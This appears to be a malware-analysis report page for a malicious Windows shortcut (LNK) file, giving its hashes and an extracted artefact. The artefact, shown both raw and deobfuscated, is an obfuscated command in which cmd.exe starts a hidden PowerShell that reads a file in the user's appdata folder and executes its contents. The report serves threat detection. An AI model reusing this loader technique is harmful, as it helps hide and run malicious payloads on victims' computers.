Malicious

cd0e4b780aed14240fb43883a4dff0a0

Share on LinkedIn Add to favorites

LNK File

MD5: cd0e4b780aed14240fb43883a4dff0a0

Size: 1.04 KB

application/x-ms-shortcut

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	cd0e4b780aed14240fb43883a4dff0a0
Sha1	0b76a2d6cf96ad30e2b10b64336384d846e9076e
Sha256	79f490b5b77b744532dfb6fd2fcc2ee13968c980066ae9c291476b3881c4a5ab
Sha384	5a54b64938f815dfb4e5b0d8976c559811ab932e0f3c560e1d30b873dc76312c244d9380165f6399efc030fc9eb10493
Sha512	6591b32f849a687cf59743e0d34f4fea8f4aadf6a69bd78c83487c75f8210e3a88991c823d652d51ea70b962228ba31b2468167de2ce93038d0718c94849e19c
SSDeep	12:8AlXEY0m/3BVSXzZUllGW+fnGUA5XkypfJjcMgTCI/JUl5OBUiNMI0Y23Kyt+8j:8AtJ/ByUl1+fnGVfJAMDuUKHYVKB
TLSH	9F11BD188FC71315FAB78939997E2305A93AB805FE635E1D4190858818FA700B925F2A

File Structure

Artefacts

Name	Value
LNK: Command Execution	cmd.exe /c START "Nonpesti" /min powershell.exe -COMMAND "$gribeflad=gc ($HOME+'/app'+'data/local/Torrentw');$gasturb=$gribeflad[4616]+$gribeflad[4617]+$gribeflad[4618]; . ($gasturb) $gribeflad"
Deobfuscated PowerShell	$gribeflad = Get-Content ($HOME + "/appdata/local/Torrentw") $gasturb = $gribeflad[4616] + $gribeflad[4617] + $gribeflad[4618] . ($gasturb) $gribeflad

cd0e4b780aed14240fb43883a4dff0a0 (1.04 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙